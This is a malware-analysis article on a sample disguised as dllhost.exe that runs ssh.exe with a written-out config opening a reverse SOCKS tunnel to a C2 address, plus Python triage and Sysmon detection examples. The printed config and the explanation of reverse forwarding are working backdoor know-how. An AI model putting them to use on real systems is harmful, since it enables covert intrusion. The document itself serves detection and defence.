OpenSSH has become a standard tool for secure remote management on both Linux and Windows systems.
Since its inclusion as a default component in Windows 10 version 1803, attackers have increasingly exploited its presence, leveraging it as a “Living Off the Land Binary” (LOLBIN).
This means adversaries use trusted system tools such as ssh.exe to evade detection and establish persistent access. A recent malware sample, disguised as dllhost.exe, demonstrates this abuse.
According to the report, the malware first attempts to start the legitimate SSHService program and, if that fails, reads or creates the registry key SOFTWARE\SSHservice, where it stores a randomly chosen port for future connections.
This tactic not only helps the malware maintain stealth but also leverages the Windows Registry, a common persistence mechanism used by many threat actors.
Registry Manipulation and SSH Configuration
The malware’s workflow involves several technical steps:
- Registry Key Usage: The malware checks for a registry key to retrieve the port number used by the SSH service. If the key is absent, it generates a new random port and saves it there. Using the Windows Registry for such configuration data is a prevalent technique among many malware families for persistence and stealth.
- SSH Configuration File Creation: The malware writes a custom SSH config file to c:\windows\temp\config, specifying the attacker’s Command and Control (C2) server, a username, and the port. The configuration includes directives such as RemoteForward and StrictHostKeyChecking. The RemoteForward line carries only a listening port (discussed in the note under the sample configuration); the intention is clear: to tunnel traffic back through the victim and enable remote access.
- Process Execution: The malware enters an infinite loop, periodically sleeping before launching ssh.exe with the malicious configuration file (the -F option points ssh at a config file). This ensures persistent attempts to connect to the attacker’s infrastructure.
Sample SSH Configuration Created by Malware:

```text
Host version
Hostname 193.187.174.3
User ugueegfueuagu17t1424acs
Port 443
ServerAliveInterval 60
ServerAliveCountMax 15
RemoteForward 40909
StrictHostKeyChecking no
SessionType None
```
Note: The two-argument form of RemoteForward is

```text
RemoteForward [bind_address:]port host:hostport
```

which forwards connections arriving on the server’s listening port to a fixed host:hostport reachable from the client. The configuration above gives only the listening port. On OpenSSH 7.6 and later that is not a syntax error: a RemoteForward with no destination requests reverse dynamic forwarding (the equivalent of ssh -R 40909), so the C2 server listens on port 40909 as a SOCKS proxy whose outbound connections are made from the victim. That gives the attacker a pivot into the victim’s network rather than a single forwarded port, which is more useful to a backdoor than the two-argument form. The one directive that does limit the file is SessionType (the equivalent of ssh -N, run no remote command), which was only added in OpenSSH 8.7; an older client rejects it as a bad configuration option and aborts before connecting.
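To make the RemoteForward distinction concrete, here is an added example of mine (not code from the article, the report, or the malware) that parses a client config in the format shown above and classifies forwarding directives the way OpenSSH’s own option parser does: one argument is reverse dynamic (SOCKS) forwarding, two is a fixed destination, anything else is rejected. The embedded config is a copy of the one quoted above; the other flagged settings (port 443, a raw IP as HostName, host key checking disabled, SessionType none) are triage heuristics I chose, not indicators from the report.

```python
"""Triage an OpenSSH client config for backdoor-style settings.

Added example, not code from the article or the analysed malware. ssh_config
lines are "Directive value" (or "Directive=value"); directive names are
case-insensitive, so they are lower-cased before comparison.
"""
import re
from dataclasses import dataclass

# Constructed copy of the configuration quoted in the article.
SAMPLE_CONFIG = """\
Host version
Hostname 193.187.174.3
User ugueegfueuagu17t1424acs
Port 443
ServerAliveInterval 60
ServerAliveCountMax 15
RemoteForward 40909
StrictHostKeyChecking no
SessionType None
"""

IPV4 = re.compile(r"\d{1,3}(\.\d{1,3}){3}")


@dataclass
class Finding:
    directive: str
    value: str
    reason: str


def parse_ssh_config(text):
    """Return (directive, args) pairs in file order, skipping blanks/comments."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.replace("=", " ", 1).split(None, 1)
        key = parts[0].lower()
        args = parts[1].split() if len(parts) > 1 else []
        entries.append((key, args))
    return entries


def classify_remote_forward(args):
    """Mirror OpenSSH's readconf.c handling of RemoteForward:
    one argument = reverse dynamic (SOCKS) forwarding (OpenSSH 7.6+),
    two arguments = listening port plus host:hostport destination,
    anything else is a fatal parse error ('missing port' / 'garbage at end of line')."""
    if len(args) == 1:
        return "reverse-socks"
    if len(args) == 2:
        return "destination"
    return "malformed"


def triage(text):
    """Collect the directives that matter for a backdoor assessment."""
    findings = []
    for key, args in parse_ssh_config(text):
        value = " ".join(args)
        if key == "remoteforward":
            kind = classify_remote_forward(args)
            if kind == "reverse-socks":
                reason = (f"reverse SOCKS proxy: the server listens on {args[0]} and "
                          "proxies connections out through this host (OpenSSH 7.6+)")
            elif kind == "destination":
                reason = f"server port {args[0]} forwarded to {args[1]} via this host"
            else:
                reason = "malformed RemoteForward; ssh would reject the file"
            findings.append(Finding(key, value, reason))
        elif key == "stricthostkeychecking" and value.lower() == "no":
            findings.append(Finding(key, value, "host key verification disabled"))
        elif key == "sessiontype" and value.lower() == "none":
            findings.append(Finding(key, value,
                "no shell or command: tunnel-only session (directive exists since OpenSSH 8.7)"))
        elif key == "hostname" and IPV4.fullmatch(value):
            findings.append(Finding(key, value, "raw IP address as destination"))
        elif key == "port" and value == "443":
            findings.append(Finding(key, value, "SSH on 443 to blend with HTTPS egress"))
    return findings


def backdoor_like(text):
    """Reverse forwarding combined with a tunnel-only or no-verification
    setting is the profile of the sample above, not of a normal client."""
    directives = {f.directive for f in triage(text)}
    return "remoteforward" in directives and bool(
        directives & {"sessiontype", "stricthostkeychecking"})


if __name__ == "__main__":
    for f in triage(SAMPLE_CONFIG):
        print(f"{f.directive:22} {f.value:20} {f.reason}")
    print("backdoor-like:", backdoor_like(SAMPLE_CONFIG))
```

The parser deliberately classifies rather than validates: a single-argument RemoteForward is the more dangerous case, so treating it as "broken" would hide exactly the configuration a defender most needs to see.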
Stealth, Persistence, and Detection Challenges
Attackers’ use of legitimate system binaries and registry keys complicates detection.
The malware’s reliance on OpenSSH’s default behavior, such as forking new processes and redirecting standard input/output, can mimic normal administrative activity, making it difficult for traditional security tools to distinguish malicious sessions from legitimate ones.
Furthermore, registry-based persistence is a well-documented tactic, with many advanced threats modifying or hiding registry keys to evade removal and maintain access.
Common Persistence and Detection Evasion Techniques:

| Technique | Description |
|---|---|
| Registry Key Manipulation | Stores the backdoor’s port under SOFTWARE\SSHservice so it can be reused on every future connection attempt |
| LOLBIN Abuse | Uses trusted binaries (e.g., ssh.exe) to blend malicious actions with normal ones |
| Custom SSH Config | Enables stealthy C2 communication and port forwarding from a config file (c:\windows\temp\config) rather than from the command line |
| Process Masquerading | Runs under generic names (e.g., dllhost.exe) to avoid suspicion |
The integration of OpenSSH into default Windows installations has expanded the attack surface for adversaries, who now routinely abuse trusted system tools for persistence and covert access.
Defenders should monitor for unusual registry modifications (such as new values under SOFTWARE\SSHservice), SSH configuration files outside the locations Windows OpenSSH normally reads (%ProgramData%\ssh\ssh_config and a user’s .ssh\config), and anomalous launches of ssh.exe, particularly with -F pointing at a temporary directory or from an unexpected parent process.
Regular integrity checks and behavioral monitoring are essential to detect such threats before they can establish a persistent foothold.
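As an added detection example (mine, not from the article or the report), the following correlates Sysmon-style process, file and registry events for the chain described above: a masqueraded dllhost.exe writing HKLM\SOFTWARE\SSHservice and C:\Windows\Temp\config, then spawning ssh.exe with -F pointing at that file. The events are constructed for the example; the field names follow Sysmon’s schema (Event IDs 1, 11 and 13), and the expected config locations (%ProgramData%\ssh and a user’s .ssh directory) are where Windows OpenSSH normally reads client configuration. The parent-process allowlist is an assumption to tune per environment.

```python
"""Correlate Sysmon-style telemetry for the ssh.exe backdoor pattern.

Added example, not code from the article. Events are constructed; field
names mirror Sysmon (Image, CommandLine, ParentImage, TargetObject,
TargetFilename, ProcessGuid). ntpath is used so the Windows paths parse
correctly even when this runs on a non-Windows analysis host.
"""
import ntpath
import re

SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
EXPECTED_CONFIG_DIR = r"c:\programdata\ssh"      # system-wide client config on Windows
# Assumption: parents from which an interactive ssh.exe launch is expected.
INTERACTIVE_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe", "windowsterminal.exe"}

# Constructed events: {A} is the masqueraded dropper, {B} its ssh.exe child,
# {C} a benign admin session launched from PowerShell.
EVENTS = [
    {"EventID": 13, "ProcessGuid": "{A}", "Image": r"C:\Users\Public\dllhost.exe",
     "TargetObject": r"HKLM\SOFTWARE\SSHservice\Port", "Details": "DWORD (0x00009fdd)"},
    {"EventID": 11, "ProcessGuid": "{A}", "Image": r"C:\Users\Public\dllhost.exe",
     "TargetFilename": r"C:\Windows\Temp\config"},
    {"EventID": 1, "ProcessGuid": "{B}", "ParentProcessGuid": "{A}",
     "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "ParentImage": r"C:\Users\Public\dllhost.exe",
     "CommandLine": r"ssh.exe -F C:\Windows\Temp\config version"},
    {"EventID": 1, "ProcessGuid": "{C}", "ParentProcessGuid": "{D}",
     "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"ssh.exe admin@bastion.corp.example"},
]


def norm(path):
    return path.lower()


def config_path_from_cmdline(cmdline):
    """Return the -F argument of an ssh command line (quoted or not), or None."""
    args = re.findall(r'"[^"]*"|\S+', cmdline)
    for i, a in enumerate(args):
        if a == "-F" and i + 1 < len(args):
            return args[i + 1].strip('"')
        if a.startswith("-F") and len(a) > 2:
            return a[2:].strip('"')
    return None


def suspicious_config_path(path):
    """True unless the config lives where Windows OpenSSH normally reads it."""
    p = norm(path)
    return not (p.startswith(EXPECTED_CONFIG_DIR + "\\") or "\\.ssh\\" in p)


def masquerading(image):
    """A System32 binary name (dllhost.exe, svchost.exe) running from elsewhere."""
    directory, base = ntpath.split(norm(image))
    return base in {"dllhost.exe", "svchost.exe"} and directory not in SYSTEM_DIRS


def detect(events):
    """Return (rule, ProcessGuid) pairs, de-duplicated, in detection order."""
    findings, seen = [], set()

    def add(rule, guid):
        if (rule, guid) not in seen:
            seen.add((rule, guid))
            findings.append((rule, guid))

    config_writers = {}  # ProcessGuid -> config path it created, for correlation
    for e in events:
        eid, guid = e["EventID"], e["ProcessGuid"]
        if masquerading(e["Image"]):
            add("masquerading_image", guid)
        if eid == 13 and norm(e["TargetObject"]).startswith(r"hklm\software\sshservice"):
            add("registry_sshservice_write", guid)
        if eid == 11:
            target = norm(e["TargetFilename"])
            if target.startswith("c:\\windows\\temp\\") and ntpath.basename(target) == "config":
                add("ssh_config_in_temp", guid)
                config_writers[guid] = target
        if eid == 1 and ntpath.basename(norm(e["Image"])) == "ssh.exe":
            cfg = config_path_from_cmdline(e["CommandLine"])
            if cfg and suspicious_config_path(cfg):
                add("ssh_custom_config", guid)
            if ntpath.basename(norm(e["ParentImage"])) not in INTERACTIVE_PARENTS:
                add("ssh_noninteractive_parent", guid)
            # Strongest signal: ssh.exe reading a config its own parent just wrote.
            if cfg and config_writers.get(e.get("ParentProcessGuid")) == norm(cfg):
                add("ssh_launched_with_self_written_config", guid)
    return findings


if __name__ == "__main__":
    for rule, guid in detect(EVENTS):
        print(f"{guid:5} {rule}")
```

Each rule alone is noisy (administrators do use -F, and scripts do launch ssh.exe non-interactively); the correlation of a file-create event with the -F path of a child ssh.exe, combined with the SSHservice registry write, is what separates this sample from routine use.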
OpenSSH’s ubiquity and flexibility make it a powerful tool for both administrators and attackers—continuous monitoring and advanced detection strategies are critical to defend against simple yet effective SSH backdoors.